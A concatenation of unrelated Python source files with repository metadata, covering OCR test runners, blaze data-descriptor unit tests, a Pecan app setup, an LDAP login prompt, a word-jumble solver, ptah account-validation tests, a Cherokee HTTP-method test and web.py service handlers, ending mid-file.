d9332139e4e0406524c2182908c2c428174d2b43
51d458de0d722543e691eb91afc915346b927962
refs/heads/master
2021-01-22T11:41:31.239236
2014-05-27T04:43:04
2014-05-27T04:43:04
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import sys, os
import Image
from pytesser import *
from test_filters import *

def main():
    if len(sys.argv) > 1:
        image_file_path = sys.argv[1]
        if os.path.isfile(image_file_path):
            try:
                if sys.argv[2] == 'print':
                    run_tests(image_file_path, True)
                else:
                    run_tests(image_file_path, False)
            except:
                run_tests(image_file_path, False)
        else:
            print 'Image file does not exist'
    else:
        print 'First parameter must be an image file name'

if __name__ == '__main__':
    main()
UTF-8
Python
false
false
2,014
10,849,087,393,659
8f4c2ab43c908a078e5c6107bf236da2547ba6c5
840135800304d6c3c60951eb209907ecbc739988
/blaze/datadescriptor/tests/test_numpy_data_descriptor.py
30501871957486bc7222e6a566e1d527889c6fa6
[ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause" ]
non_permissive
aashish24/blaze
https://github.com/aashish24/blaze
554736ca970c59207d2810fe85f98bdd0cab5304
1e840c4e09eeb39a438e6568462b9eb6e288d866
refs/heads/master
2020-12-25T05:34:24.470753
2013-06-18T08:28:50
2013-06-18T08:29:11
10,772,911
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import unittest import numpy as np import blaze from blaze import datashape from blaze.datadescriptor import (NumPyDataDescriptor, IDataDescriptor, IElementReader, IElementReadIter, IElementWriter, IElementWriteIter, dd_as_py) from blaze.py3help import _inttypes, izip import ctypes class TestNumPyDataDescriptor(unittest.TestCase): def test_basic_object_type(self): self.assertTrue(issubclass(NumPyDataDescriptor, IDataDescriptor)) a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Make sure the right type is returned self.assertTrue(isinstance(dd, IDataDescriptor)) self.assertEqual(dd_as_py(dd), [[0,1,2], [3,4,5]]) def test_descriptor_iter_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Iteration should produce NumPyDataDescriptor instances vals = [] for el in dd: self.assertTrue(isinstance(el, NumPyDataDescriptor)) self.assertTrue(isinstance(el, IDataDescriptor)) vals.append(dd_as_py(el)) self.assertEqual(vals, [[0,1,2], [3,4,5]]) def test_descriptor_getitem_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Indexing should produce NumPyDataDescriptor instances self.assertTrue(isinstance(dd[0], NumPyDataDescriptor)) self.assertEqual(dd_as_py(dd[0]), [0,1,2]) self.assertTrue(isinstance(dd[1,2], NumPyDataDescriptor)) self.assertEqual(dd_as_py(dd[1,2]), 5) def test_element_iter_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Requesting element iteration should produce an # IElementReadIter object ei = dd.element_read_iter() self.assertTrue(isinstance(ei, IElementReadIter)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers for ptr in ei: self.assertTrue(isinstance(ptr, _inttypes)) def test_element_getitem_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Requesting get_element with one index should produce an # IElementReader object ge = dd.element_reader(1) self.assertTrue(isinstance(ge, IElementReader)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers self.assertTrue(isinstance(ge.read_single((1,)), _inttypes)) # Requesting element reader with two indices should produce an # IElementReader object ge = dd.element_reader(2) self.assertTrue(isinstance(ge, IElementReader)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers self.assertTrue(isinstance(ge.read_single((1,2)), _inttypes)) def test_element_write(self): a = np.array([1, 2, 3, 4, 5], dtype=np.int32) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) ge = dd.element_writer(1) self.assertTrue(isinstance(ge, IElementWriter)) x = ctypes.c_int32(123) ge.write_single((1,), ctypes.addressof(x)) self.assertEqual(dd_as_py(dd), [1,123,3,4,5]) with ge.buffered_ptr((3,)) as dst_ptr: x = ctypes.c_int32(456) ctypes.memmove(dst_ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [1,123,3,456,5]) def test_element_iter_write(self): a = np.array([1, 2, 3, 4, 5], dtype=np.int32) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) with dd.element_write_iter() as ge: self.assertTrue(isinstance(ge, IElementWriteIter)) for val, ptr in izip([5,7,4,5,3], ge): x = ctypes.c_int32(val) ctypes.memmove(ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [5,7,4,5,3]) def test_element_write_buffered(self): a = np.array([1, 2, 3, 4, 5], dtype=np.dtype(np.int32).newbyteorder()) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) 
self.assertFalse(dd.npyarr.dtype.isnative) ge = dd.element_writer(1) self.assertTrue(isinstance(ge, IElementWriter)) x = ctypes.c_int32(123) ge.write_single((1,), ctypes.addressof(x)) self.assertEqual(dd_as_py(dd), [1,123,3,4,5]) with ge.buffered_ptr((3,)) as dst_ptr: x = ctypes.c_int32(456) ctypes.memmove(dst_ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [1,123,3,456,5]) def test_element_iter_write_buffered(self): a = np.array([1, 2, 3, 4, 5], dtype=np.dtype(np.int32).newbyteorder()) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) with dd.element_write_iter() as ge: self.assertTrue(isinstance(ge, IElementWriteIter)) for val, ptr in izip([5,7,4,5,3], ge): x = ctypes.c_int64(val) ctypes.memmove(ptr, ctypes.addressof(x), 8) self.assertEqual(dd_as_py(dd), [5,7,4,5,3]) if __name__ == '__main__': unittest.main()
UTF-8
Python
false
false
2,013
2,774,548,893,108
ccebf70621ff118f36d9850941249a50ba708a3d
3927e4048fbef289fb85ace47ca20e62edb88992
/skb/app.py
79a0f5c17f6da5a42a1a32dc11accfbc7bdeeabe
[]
no_license
sechastain/SKB
https://github.com/sechastain/SKB
e39914949ff10ebe7ba0a65c387497dff2cc418e
be0f96684713e1b8f1e116ff311ecc6e150dc7a2
refs/heads/master
2016-11-02T06:56:18.577962
2012-03-10T02:44:28
2012-03-10T02:44:28
3,442,080
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from pecan import make_app
from pecan.hooks import TransactionHook
from skb import model
from skb.controllers.root import RootController

def setup_app(config):
    model.init_model()
    return make_app(
        RootController(),  # config.app.root,
        static_root = config.app.static_root,
        debug = config.app.debug,
        logging = config.app.logging,
        template_path = config.app.template_path,
        force_canonical = config.app.force_canonical,
        hooks = [
            TransactionHook(
                model.start,
                model.start_ro,
                model.commit,
                model.rollback,
                model.clear
            )
        ]
    )
UTF-8
Python
false
false
2,012
10,720,238,379,886
6191bb8c749ad2d34c3afb09c05822c84475ab0b
0be52e0a7d788088bc5a79559b9bb2532d17a210
/lib/ldapalchemy/cli/logindialog.py
59c93939cd8ffcb20cbd5598f9288770dd627ee0
[]
no_license
clebergnu/ldapalchemy
https://github.com/clebergnu/ldapalchemy
e3439a6b45ab9b9b45fc2548faf7b8fe402586c7
af3b021a5b9ebad337c6665a56b6428f42daf18c
refs/heads/master
2021-01-20T09:01:38.517110
2010-10-20T17:15:42
2010-10-20T17:15:42
1,009,678
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- Mode: Python; coding: iso-8859-1 -*- # vi:si:et:sw=4:sts=4:ts=4 ## ## This file is part of LDAPAlchemy ## Copyright (C) 2009 Cleber Rodrigues <[email protected]> ## All rights reserved ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## This program is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with this program; if not, write to the Free Software ## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, ## USA. ## ## Author(s): Cleber Rodrigues <[email protected]> ## __all__ = ['LdapLoginDlg'] import ldap import ldapurl import getpass from ldapalchemy.engine import Engine from ldapalchemy.config import DefaultConfig from ldapalchemy.exceptions import LDAPInvalidURI class LdapLoginDialog: ''' A LoginDlg that attempts to establish a connection to a LDAP server ''' def __init__(self): self.config = DefaultConfig def __create_engine(self): ''' Creates the engine. Usually called by run() ''' try: self.engine = Engine(self.config.connection_uri, binddn=self.config.connection_binddn, bindpw=self.config.connection_bindpw) except ldap.NO_SUCH_OBJECT: pass except ldap.INVALID_CREDENTIALS: pass def __input_connection_uri(self): ''' Asks for the connection uri ''' uri = raw_input('Enter LDAP server URI [%s]: ' \ % self.config.connection_uri) if not uri: return self.config.connection_uri if not ldapurl.isLDAPUrl(uri): raise LDAPInvalidURI return uri def __input_connection_binddn(self): ''' Asks for the connection binddn ''' binddn = raw_input('Enter the bind DN [%s]: ' \ % self.config.connection_binddn) return binddn def __input_connection_bindpw(self): ''' Asks for the connection binddn ''' bindpw = getpass.getpass('Enter the bind password [********]: ') return bindpw def __input_connection(self): try: print 'Connecting to LDAP server...' self.config.connection_uri = self.__input_connection_uri() self.config.connection_binddn = self.__input_connection_binddn() self.config.connection_bindpw = self.__input_connection_bindpw() except KeyboardInterrupt: print 'Cancelled!' except LDAPInvalidURI: print 'Error: Invalid LDAP URI! Exiting...' raise SystemExit def run(self): self.__input_connection() self.__create_engine() return self.engine if __name__ == '__main__': l = LdapLoginDialog() l.run()
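The dialog reads its defaults from ldapalchemy.config.DefaultConfig, but only three attributes are ever touched, so a stand-in configuration for experimenting could look like this (values are illustrative; run() will still prompt interactively, offering these as defaults):

class StubConfig(object):
    connection_uri = 'ldap://localhost:389'
    connection_binddn = 'cn=admin,dc=example,dc=com'
    connection_bindpw = 'secret'

dlg = LdapLoginDialog()
dlg.config = StubConfig    # same pattern as the default: a class carrying the three attributes
engine = dlg.run()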
UTF-8
Python
false
false
2,010
16,140,487,136,746
2370c7b40718340efd160a3e307b3ca6b796aed0
4e1bfc6c27761efd9292021861437b105825f9e1
/mTurkExperiments/NearHomophone/PhoneticConfusion/getPhoneEditDistance.py
4028a5dfefa677409f9b2a69459fda199e1a62ac
[]
no_license
justinek/pun-paper
https://github.com/justinek/pun-paper
5618ce06c972cbb49f1fe2c7aa12dc354703c6c8
01a6f60989aca5d2d8821e94b1a0b4c1dcee7b9c
refs/heads/master
2016-08-04T22:13:03.636006
2014-07-17T03:09:39
2014-07-17T03:09:39
13,692,338
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import sys, re, string, editdist

# get edit distance by phone
firstline = 0
phonesDict = dict()

f = open("../Materials/nearPuns_phones.txt", "r")
for l in f:
    if firstline == 0:
        firstline = 1
    else:
        l = l.replace("\n", "")
        toks = l.split("\t")
        phones1 = toks[4].split()
        for p in phones1:
            phonesDict[p] = 1
        phones2 = toks[5].split()
        for p in phones2:
            phonesDict[p] = 1

# print len(phonesDict.keys())

# make dictionary mapping phones onto distinct characters
i = 65
for p in phonesDict.keys():
    phonesDict[p] = chr(i)
    i = i + 1

f.close()

f = open("../Materials/nearPuns_phones.txt", "r")
firstline = 0
for l in f:
    l = l.replace("\n", "")
    if firstline == 0:
        toks = l.split("\t")
        print "\t".join(toks[0:6]) + "\tphoneDist"
        firstline = 1
    else:
        toks = l.split("\t")
        phones1 = toks[4].split()
        phones1_trans = []
        for p1 in phones1:
            t1 = phonesDict[p1]
            phones1_trans.append(t1)
        phones1_translated = "".join(phones1_trans)
        phones2 = toks[5].split()
        phones2_trans = []
        for p2 in phones2:
            t2 = phonesDict[p2]
            phones2_trans.append(t2)
        phones2_translated = "".join(phones2_trans)
        phoneDist = editdist.distance(phones1_translated, phones2_translated)
        print "\t".join(toks[0:6]) + "\t" + str(phoneDist) + "\t" + str(len(phones1)) + "\t" + str(len(phones2))
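The editdist module used above is a third-party C extension; assuming editdist.distance computes a plain Levenshtein distance over the single-character phone encodings, a pure-Python equivalent for reference (illustrative only, not the module's actual implementation):

def levenshtein(a, b):
    # classic dynamic-programming edit distance
    prev = range(len(b) + 1)
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # deletion
                           cur[j - 1] + 1,               # insertion
                           prev[j - 1] + (ca != cb)))    # substitution
        prev = cur
    return prev[-1]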
UTF-8
Python
false
false
2,014
13,159,779,843,836
0f1f736f44a1d29756387aad2f692f3ef32fedab
c298ea6b6e6379b74764bd1d76f2510daecc387c
/word_jumble.py
7bd9a0a4000aecfdd51a08dd047d0642db64f79b
[]
no_license
kchandrasekera/word_jumble
https://github.com/kchandrasekera/word_jumble
e2ef5b31f0bdfa9f010a646792cf7c43bb3d44d7
edd4853f5f58ec11e197a1c50b9102b920acbb4e
refs/heads/master
2020-04-06T07:10:33.498441
2014-02-14T05:07:15
2014-02-14T05:07:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
def word_jumble():
    scrambled_word = raw_input('Enter a word to scramble: ')
    matching_words = []
    scrambled_word_length = len(scrambled_word)
    dictionary = import_dictionary('dictionary.txt')
    dictionary.sort(key = len)
    for word in dictionary:
        if len(word) > scrambled_word_length:
            if scrambled_word in matching_words:
                matching_words.remove(scrambled_word)
            break
        if matching_word(word, scrambled_word):
            matching_words.append(word)
    return matching_words

def import_dictionary(file):
    dictionary_file = open(file)
    dictionary = dictionary_file.read().splitlines()
    dictionary_file.close()
    return dictionary

def matching_word(word, scrambled_word):
    characters = list(scrambled_word)
    for letter in word:
        if letter in characters:
            characters.remove(letter)
        else:
            return False
    return True

print word_jumble()
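Note that matching_word() is a multiset-containment test: every letter of word must be drawable from the scrambled letters, so the solver also returns shorter words built from a subset of the letters, not just full anagrams. For example (hypothetical inputs):

matching_word('tea', 'eat')   # True  -- every letter is available
matching_word('tee', 'eat')   # False -- only one 'e' to draw from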
UTF-8
Python
false
false
2,014
6,347,961,713,447
93f2eea1b2c5e5225fd5d536cc97682676426453
d23161292ed65a3c4f5e7e9be0d204f30a31e757
/yushen_django_1_0/src/yushen/admin.py
e60c40282c2c3e0b9cf6bb369ba65a1c0b180226
[]
no_license
wolfsniper2388/yushen_django_1_0
https://github.com/wolfsniper2388/yushen_django_1_0
424126f6b9865c8d890cda1032bb63072f550682
fd7fd2ed98b01ff71e42a33cc09d2da8df6de652
refs/heads/master
2022-02-14T17:59:06.217577
2014-03-14T00:07:24
2014-03-14T00:07:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib import admin
from yushen.models import Part

# Register your models here.
class PartAdmin(admin.ModelAdmin):
    list_display = ('identifier', 'type', 'elevator', 'visibility')
    list_filter = ['type', 'elevator', 'visibility']
    search_fields = ['identifier']

admin.site.register(Part, PartAdmin)
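The Part model lives in yushen.models and is not shown here; a hypothetical minimal definition consistent with the fields referenced in list_display and list_filter (field types and lengths are guesses):

from django.db import models

class Part(models.Model):
    identifier = models.CharField(max_length=100)
    type = models.CharField(max_length=50)
    elevator = models.CharField(max_length=50)
    visibility = models.BooleanField(default=True)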
UTF-8
Python
false
false
2,014
17,867,063,964,727
e1f4211e4dee261872e7e95f748cdc32a171de4f
0aae130425f7b1ebee373388245f385502746002
/src/api/session.py
15b64e034acb507979613f3a7d6794c70f862943
[]
no_license
tdyhacker/smuggler
https://github.com/tdyhacker/smuggler
525d5bc985a9dcbe4b5c24e14706ee37604653b9
e839a95e302062227aecc5a68c8dc1da50639c5f
refs/heads/master
2015-09-26T03:12:44.809144
2009-06-30T16:59:48
2009-06-30T16:59:48
41,992,961
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class User(object):
    def __init__(self, id, nickName, displayName, passwordHash, accountType, fileSizeLimit):
        self.id = id
        self.nickName = nickName
        self.displayName = displayName
        self.passwordHash = passwordHash
        self.accountType = accountType
        self.fileSizeLimit = fileSizeLimit

    def __repr__(self):
        return '<%s id = %s, nickName = %s, displayName = %s>' % (self.__class__.__name__, self.id, self.nickName, self.displayName)

class Session(object):
    def __init__(self, id):
        self.id = id

    def __repr__(self):
        return '<%s "%s">' % (self.__class__.__name__, self.id)
UTF-8
Python
false
false
2,009
128,849,052,166
ae59c221568944a3fa33bf4e7038b53d61f123fe
91b051b7a8d837033761cc10d69a6e47c64fd600
/ptah/crowd/tests/test_validation.py
1fe49efeb22df241ae25d1db40d459d874d8ba93
[ "BSD-2-Clause", "BSD-3-Clause" ]
permissive
blaflamme/ptah
https://github.com/blaflamme/ptah
f315c9f0de9b6fc56904589fe701435b971f6a51
32497151e0556b84d47a146499dfe1bcb0ab02db
refs/heads/master
2021-01-18T12:15:02.895925
2011-11-02T03:00:30
2011-11-02T03:00:30
2,692,172
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os, transaction import ptah, ptah.crowd from ptah import config from ptah.authentication import AuthInfo from pyramid.testing import DummyRequest from base import Base class Principal(object): def __init__(self, uri, name, login): self.uri = uri self.name = name self.login = login class TestValidation(Base): def test_validation_auth_checker_validation(self): from ptah.crowd.validation import validationAndSuspendedChecker principal = Principal('1', 'user', 'user') props = ptah.crowd.get_properties(principal.uri) props.validated = False # validation disabled info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = False self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['allow-unvalidated'] = False self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() # validation enabled info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = True ptah.crowd.CONFIG['allow-unvalidated'] = False self.assertFalse(validationAndSuspendedChecker(info)) self.assertEqual(info.message, 'Account is not validated.') transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['allow-unvalidated'] = True self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() # validated props = ptah.crowd.get_properties(principal.uri) props.validated = True transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = True self.assertTrue(validationAndSuspendedChecker(info)) def test_validation_auth_checker_suspended(self): from ptah.authentication import AuthInfo from ptah.crowd.validation import validationAndSuspendedChecker principal = Principal('2', 'user', 'user') props = ptah.crowd.get_properties(principal.uri) props.validated = True props.suspended = False info = AuthInfo(True, principal) self.assertTrue(validationAndSuspendedChecker(info)) props.suspended = True transaction.commit() info = AuthInfo(True, principal) self.assertFalse(validationAndSuspendedChecker(info)) self.assertEqual(info.message, 'Account is suspended.') def test_validation_registered_unvalidated(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = True config.notify(ptah.events.PrincipalRegisteredEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertFalse(props.validated) def test_validation_registered_no_validation(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = False config.notify(ptah.events.PrincipalRegisteredEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) def test_validation_added(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = False config.notify(ptah.events.PrincipalAddedEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = True config.notify(ptah.events.PrincipalAddedEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) def test_validation_initiate(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser origValidationTemplate = validation.ValidationTemplate class Stub(origValidationTemplate): status = '' token = None def send(self): Stub.status = 'Email has been sended' Stub.token = self.token validation.ValidationTemplate 
= Stub user = CrowdUser('name', 'login', 'email') request = self._makeRequest() validation.initiate_email_validation(user.email, user, request) self.assertEqual(Stub.status, 'Email has been sended') self.assertIsNotNone(Stub.token) t = ptah.token.service.get_bydata(validation.TOKEN_TYPE, user.uri) self.assertEqual(Stub.token, t) validation.ValidationTemplate = origValidationTemplate def test_validation_template(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser origValidationTemplate = validation.ValidationTemplate user = CrowdUser('name', 'login', 'email') request = self._makeRequest() template = validation.ValidationTemplate( user, request, email = user.email, token = 'test-token') template.update() res = template.render() self.assertIn( "You're close to completing the registration process.", res) self.assertIn( "http://localhost:8080/validateaccount.html?token=test-token", res) def test_validate(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser, Session user = CrowdUser('name', 'login', 'email') Session.add(user) Session.flush() t = ptah.token.service.generate(validation.TOKEN_TYPE, user.uri) request = DummyRequest() self._setRequest(request) try: validation.validate(request) except: pass self.assertIn( "Can't validate email address.", request.session['msgservice'][0]) props = ptah.crowd.get_properties(user.uri) props.validated = False request.GET['token'] = t request.session.clear() try: validation.validate(request) except: pass self.assertIn( "Account has been successfully validated.", request.session['msgservice'][0]) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated)
UTF-8
Python
false
false
2,011
17,987,323,049,093
548797ee026a8c97003be93e363922e193b989c3
c88e0f422509881ffcceebc6edf3384f51ef0602
/Oblig 3/src/loop_regex.py
5b88d7ffe7c7ef65ff5262168b989491a98d2a46
[]
no_license
typisk/Inf3331
https://github.com/typisk/Inf3331
8745d19146a5edc4136c0400bbd14ce5b1bdeaaa
213a71ffc653fadaa9757400f184520337952109
refs/heads/master
2020-06-05T15:17:05.804973
2011-11-03T18:14:46
2011-11-03T18:14:46
2,270,427
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import re

loop1 = '[0:12]'
loop2 = '[0:12, 4]'

r1 = r'\[(.+):(.+?),?(.*)\]'
r2 = r'\[(.+):(.+),?(.*)\]'
r3 = r'\[(\d+):(\d+)\,?\s?(\d+)?\]'

print re.search(r3, loop1).groups()
print re.search(r3, loop2).groups()
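For reference, the capture groups r3 should produce for the two test strings, worked out by hand:

# re.search(r3, '[0:12]').groups()    -> ('0', '12', None)
# re.search(r3, '[0:12, 4]').groups() -> ('0', '12', '4')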
UTF-8
Python
false
false
2,011
2,834,678,440,287
975d263e8be2870bdaf1c9d2afa6602170c95b56
3f879f624add3a7c591825856526a3faace6e603
/qa/299-MethodsRequestBodyHandling.py
3d077fe3540697800aa7240be97d33259063e483
[ "GPL-2.0-only" ]
non_permissive
sanyaade-embedded-systems/webserver
https://github.com/sanyaade-embedded-systems/webserver
10900bbaeb0a20261c5a5681544fc4348377749b
435910ebc5e255152215869ff08f26ca2bd132fd
refs/heads/master
2020-04-05T23:23:38.234423
2012-08-30T17:31:36
2012-08-30T17:31:36
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from base import * DIR = "299-MethodsRequestBodyHandling" MAGIC = "Report bugs to http://bugs.cherokee-project.com" METHODS = { 'required': [ 'POST', 'PUT', 'MERGE', 'SEARCH', 'REPORT', 'PATCH', 'PROPFIND', 'PROPPATCH', 'UPDATE', 'LABEL', ], 'optional': [ 'OPTIONS', 'DELETE', 'MKCOL', 'COPY', 'MOVE', 'LOCK', 'UNLOCK', 'VERSION-CONTROL', 'CHECKOUT', 'UNCHECKOUT', 'CHECKIN', 'MKWORKSPACE', 'MKACTIVITY', 'BASELINE-CONTROL', ] } CONF = """ vserver!1!rule!1280!match = directory vserver!1!rule!1280!match!directory = /%s vserver!1!rule!1280!handler = common """ % (DIR) class TestEntry (TestBase): """Test for HTTP methods with required and optional request bodies being received and processed correctly by Cherokee. """ def __init__ (self, method, send_input, input_required): TestBase.__init__ (self, __file__) self.request = "%s /%s/ HTTP/1.0\r\n" % (method, DIR) +\ "Content-type: text/xml\r\n" self.expected_content = [] if input_required and not send_input: self.expected_error = 411 else: self.expected_error = 200 self.expected_content.append("Method: %s" % method) if send_input: self.request += "Content-length: %d\r\n" % (len(MAGIC)) self.post = MAGIC self.expected_content.append("Body: %s" % MAGIC) else: self.forbidden_content = 'Body:' class Test (TestCollection): def __init__ (self): TestCollection.__init__ (self, __file__) self.name = "Method Request Body Handling" self.conf = CONF self.proxy_suitable = True def Prepare (self, www): d = self.Mkdir (www, DIR) f = self.WriteFile (d, "test_index.php", 0444, """ <?php echo 'Method: '.$_SERVER['REQUEST_METHOD']; ?> <?php $body = @file_get_contents('php://input'); if (strlen($body) > 0): echo "Body: $body"; endif; ?> """) def JustBefore (self, www): # Create sub-request objects self.Empty () # Create all tests with different methods - all methods # should only work with request bodies. With no request # body a 411 Length Required should result. for method in METHODS['required']: self.Add (TestEntry (method=method, send_input=True, input_required=True)) self.Add (TestEntry (method=method, send_input=False, input_required=True)) # Create all tests with different methods - all methods # should work with and without request bodies. for method in METHODS['optional']: #Test method when for when sending a request body self.Add (TestEntry (method=method, send_input=True, input_required=False)) #Test method when not sending a request body self.Add (TestEntry (method=method, send_input=False, input_required=False))
UTF-8
Python
false
false
2,012
1,949,915,182,782
fbfef634a20fe41e766ffda0d6de0240ff453334
8fc3808225d2589259182b3d6c7918d0e6c3ab3a
/backend/handlers/service.py
498b642ece6f94e3affeb662ba1632f3d3251124
[]
no_license
tomowang/GUI
https://github.com/tomowang/GUI
4e5da37011643c9ecda6a85d189da799c5fba1b7
fe2625484470f69d0c82ceccdf16edb05382d149
refs/heads/master
2016-09-16T15:13:09.031259
2014-02-19T14:03:49
2014-02-19T14:03:49
63,295,289
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import json import logging import web import validictory from utils.decorator import * from utils.error import RESTError from utils import schema from dbapi.CMDB import CMDB class Services(): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, collector_id, **kwargs): logging.debug('Services.GET') logging.info('collector id: %s' % collector_id) web.header('Content-Type', 'application/json') if collector_id == 'null': return json.dumps([]) services = self.cmdb.GetServiceList(int(collector_id)) logging.debug(services) if not services: services = [] return json.dumps(services) @authentication @access_control def POST(self, collector_id, **kwargs): logging.debug('Services.POST') logging.debug('collector id: %s' % collector_id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') try: service = json.loads(web.data()) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.JSON_OBJECT_DECODE_ERROR') logging.debug('service: %s' % service) try: validictory.validate(service, schema.SERVICE_POST_PUT_SCHEMA) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.INVALID_PARAMETER', e.message) if service['service_type'] != 'TCP' and len(service['service_url']) == 0: raise RESTError('DEBUG.400.INVALID_PARAMETER') service['collector_id'] = int(collector_id) ret = self.cmdb.AddService(service) logging.info('add service result: %s' % ret) if not ret: raise RESTError('ERROR.500.ADD_SERVICE_ERROR') web.webapi.Created() return class Service(): def __init__(self): self.cmdb = CMDB() @authentication @access_control def PUT(self, collector_id, id, **kwargs): logging.debug('Service.PUT') logging.debug('collector id: %s' % collector_id) logging.debug('id: %s' % id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') try: service = json.loads(web.data()) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.JSON_OBJECT_DECODE_ERROR') logging.debug('service: %s' % service) try: validictory.validate(service, schema.SERVICE_POST_PUT_SCHEMA) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.INVALID_PARAMETER', e.message) if service['service_type'] != 'TCP' and len(service['service_url']) == 0: raise RESTError('DEBUG.400.INVALID_PARAMETER') service['service_id'] = int(id) service['collector_id'] = int(collector_id) ret = self.cmdb.UpdateService(service) logging.info('update service result: %s' % ret) if not ret: raise RESTError('ERROR.500.UPDATE_SERVICE_ERROR') web.webapi.OK() return @authentication @access_control def DELETE(self, collector_id, id, **kwargs): logging.debug('Service.DELETE') logging.debug('collector id: %s' % collector_id) logging.debug('id: %s' % id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') ret = self.cmdb.DeleteService(int(collector_id), int(id)) logging.info('delete service result: %s' % ret) if not ret: raise RESTError('ERROR.500.DELETE_SERVICE_ERROR') web.webapi.OK() return class ServiceList(object): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, collector_id, mode, **kwargs): logging.debug('ServiceList.GET') logging.info('collector id: %s' % collector_id) logging.info('mode: %s' % mode) web.header('Content-Type', 'application/json') if collector_id == 'null': return json.dumps([]) lookup = {'http': self.cmdb.GetHTTPServiceList, 'tcp': self.cmdb.GetTCPServiceList, 'all': self.cmdb.GetServiceList} ret = lookup[mode](int(collector_id)) ret = [{'service_id': service['service_id'], 'service_name': service['service_name']} for service in ret] return 
json.dumps(ret) class ServiceTree(object): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, **kwargs): logging.debug('ServiceTree.GET') web.header('Content-Type', 'application/json') collectors = self.cmdb.GetCollectorList() res = [] if not collectors: collectors = [] for collector in collectors: tmp = {'title': collector['collector_name'], 'isFolder': True, 'key': collector['collector_id'], 'children': []} services = self.cmdb.GetServiceList(collector['collector_id']) if not services: services = [] for service in services: tmp['children'].append({'title': service['service_name'], 'key': service['service_id'], 'type': service['service_type']}) res.append(tmp) return json.dumps(res) SERVICE_GROUP_TYPE_MAPPING = {1: 'HTTP', 2: 'TCP'} SERVICE_GROUP_TYPE_R_MAPPING = {'HTTP': 1, 'TCP': 2} class ServiceGroups(object): def __init__(self): self.cmdb = CMDB() def GET(self, mode, **kwargs): web.header('Content-Type', 'application/json') logging.info('mode: %r' % mode) if mode == 'all': #mode = ['HTTP', 'TCP'] mode = SERVICE_GROUP_TYPE_MAPPING.keys() else: #mode = [mode.upper()] mode = [SERVICE_GROUP_TYPE_R_MAPPING[mode.upper()]] sg_list = self.cmdb.GetServiceGroupList() if not sg_list: sg_list = [] sg_list = [sg for sg in sg_list if sg['group_type'] in mode] for sg in sg_list: sg['service_list'] = self.cmdb.GetServiceGroupServiceIdInfo(sg['group_id']).values() sg['group_type'] = 